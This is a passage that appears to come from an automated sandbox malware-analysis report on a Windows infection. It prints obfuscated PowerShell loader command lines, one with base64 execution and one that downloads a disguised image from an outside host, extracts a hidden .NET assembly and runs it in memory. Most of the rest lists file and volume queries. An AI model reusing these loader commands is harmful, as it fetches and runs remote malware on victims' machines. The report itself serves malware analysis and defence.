zc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyi='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfnhdvu2icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxr5ueugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlukrfrmluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1pti5ktgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagihvxeef1lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbnsfdna21olhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtdfpjwxfysujolhvpbnqgicagicagicagicagicagicagicagicagicagicagicagusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaganrsbck7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaiecigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdzsagicagicagicagicagicagicagicagicagicagicagicboc0rianhbicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjfnhdvu2ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjcumtq0lzi1mc9zd2vldg5lc3nnb29kzm9yz3jlyxruzxnzdghpbmdzd2l0agdvb2qudelgiiwijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyismcwwktttvgfyvc1ttgvlucgzkttptnzvs0utzxhwcmvzu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyi='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredtext = $originaltext -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = new-object system.net.webclient;$googleability = $unroyalist.downloaddata($vicegerents);$tuillette = [system.text.encoding]::utf8.getstring($googleability);$marischal = '<<base64_start>>';$botchedly = '<<base64_end>>';$uscher = $tuillette.indexof($marischal);$diffamed = $tuillette.indexof($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.length;$tetri = $diffamed - $uscher;$engagement = $tuillette.substring($uscher, $tetri);$admixture = -join ($engagement.tochararray() \| foreach-object { $_ })[-1..-($engagement.length)];$satisfy = [system.convert]::frombase64string($admixture);$rivets = [system.reflection.assembly]::load($satisfy);$subtractions = [dnlib.io.home].getmethod('vai');$subtractions.invoke($null, @($restoredtext, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"	Jump to behavior

Source: explorer.exe, 0000000E.00000002.2904691070.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2895440800.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1993693717.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000002.2895440800.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1989996263.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.1989328162.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2893667075.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 0000000E.00000002.2895440800.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1989996263.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000E.00000002.2895440800.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1989996263.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_027E55EB cpuid

17_2_027E55EB

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Queries volume information: C:\Users\user\AppData\Roaming\icgfugf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgfugf	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
